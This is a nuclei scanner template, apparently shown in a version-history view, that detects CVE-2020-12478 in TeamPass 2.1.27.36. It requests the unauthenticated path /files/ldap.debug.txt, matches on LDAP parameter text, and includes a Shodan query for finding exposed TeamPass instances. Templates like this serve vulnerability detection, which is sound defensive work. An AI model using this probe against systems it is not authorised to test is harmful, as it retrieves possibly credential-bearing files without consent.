nuclei-templates/http/cves/2020/CVE-2020-12478.yaml

48 lines
1.3 KiB
YAML
Raw Normal View History

2022-08-17 07:02:47 +00:00
id: CVE-2020-12478
info:
name: TeamPass 2.1.27.36 - Improper Authentication
2022-08-17 07:02:47 +00:00
author: arafatansari
severity: high
description: |
TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-08-17 07:02:47 +00:00
reference:
- https://github.com/nilsteampassnet/TeamPass/issues/2764
2022-08-17 11:15:20 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-08-17 11:15:20 +00:00
cve-id: CVE-2020-12478
cwe-id: CWE-306
2023-08-31 11:46:18 +00:00
epss-score: 0.00901
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.80707
2022-08-17 07:02:47 +00:00
metadata:
max-request: 1
2022-08-17 07:02:47 +00:00
shodan-query: http.html:"teampass"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: teampass
product: teampass
2022-08-20 09:53:00 +00:00
tags: cve,cve2020,teampass,exposure,unauth
2022-08-17 07:02:47 +00:00
http:
2022-08-17 11:15:20 +00:00
- method: GET
path:
- "{{BaseURL}}/files/ldap.debug.txt"
2022-08-17 07:02:47 +00:00
matchers-condition: and
matchers:
- type: word
2022-08-20 09:53:00 +00:00
part: body
2022-08-17 07:02:47 +00:00
words:
- 'Get all LDAP params'
2022-08-20 09:53:00 +00:00
- type: word
part: header
words:
- "text/plain"
2022-08-17 11:15:20 +00:00
- type: status
status:
- 200